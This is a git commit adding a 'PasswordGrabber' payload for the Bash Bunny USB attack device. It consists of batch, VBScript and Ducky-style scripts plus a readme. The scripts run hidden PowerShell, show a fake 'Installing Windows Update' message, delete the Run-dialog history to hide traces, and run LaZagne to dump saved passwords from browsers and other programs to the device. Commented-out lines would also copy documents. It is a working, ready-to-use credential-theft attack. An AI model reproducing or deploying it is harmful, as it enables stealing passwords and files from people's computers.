Added Password Grabber payload (#169)

* Add files via upload * Update readme.md * Update e.cmd * Update payload.txt Added 1.1 Firmware support * Update e.cmd Added Date and time functions and added some comments * Delete laZagne.exe * Update readme.md Added support to Hak5 new guidelines * Update readme.md * Update readme.md * Update readme.md * Update readme.md
2017-04-16 11:03:03 +02:00 · 2017-04-16 11:03:03 +02:00 · 2903a16d89
parent 1d95d9bfb8
commit 2903a16d89
5 changed files with 94 additions and 0 deletions
--- a/payloads/library/PasswordGrabber/d.cmd
+++ b/payloads/library/PasswordGrabber/d.cmd
@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit
--- a/payloads/library/PasswordGrabber/e.cmd
+++ b/payloads/library/PasswordGrabber/e.cmd
@ -0,0 +1,38 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+
+REM This executes LaZagne in the current directory and outputs the password file to Loot
+REM Time and Date is also added
+setlocal
+cd /d %~dp0
+%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
+
+REM These lines if you just want Passwords and no files.
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+REM Same as above but does not create empty directories
+REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
+
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
--- a/payloads/library/PasswordGrabber/i.vbs
+++ b/payloads/library/PasswordGrabber/i.vbs
@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
--- a/payloads/library/PasswordGrabber/payload.txt
+++ b/payloads/library/PasswordGrabber/payload.txt
@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Title:         USB Exfiltrator
+# Author:        Hak5Darren
+# Version:       1.1
+# Target:        Windows XP SP3+
+# Props:         Diggster, IMcPwn
+# Category:      Exfiltration
+# 
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
+#
+
+LED ATTACK
+ATTACKMODE HID STORAGE
+DUCKY_LANG se
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+LED FINISH
--- a/payloads/library/PasswordGrabber/readme.md
+++ b/payloads/library/PasswordGrabber/readme.md
@ -0,0 +1,32 @@
+# PasswordGrabber
+
+* Author: RazerBlade
+* Creds: Hak5Darren, AlessandroZ
+* Version: Version 1.1
+* Firmware support: 1.1
+* Target: Windows
+
+## Description
+
+Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
+This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+Full read here: https://github.com/AlessandroZ/LaZagne
+
+
+## Configuration
+By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
+
+Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
+When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red                | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
+
				`@ -0,0 +1 @@`
				`CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False`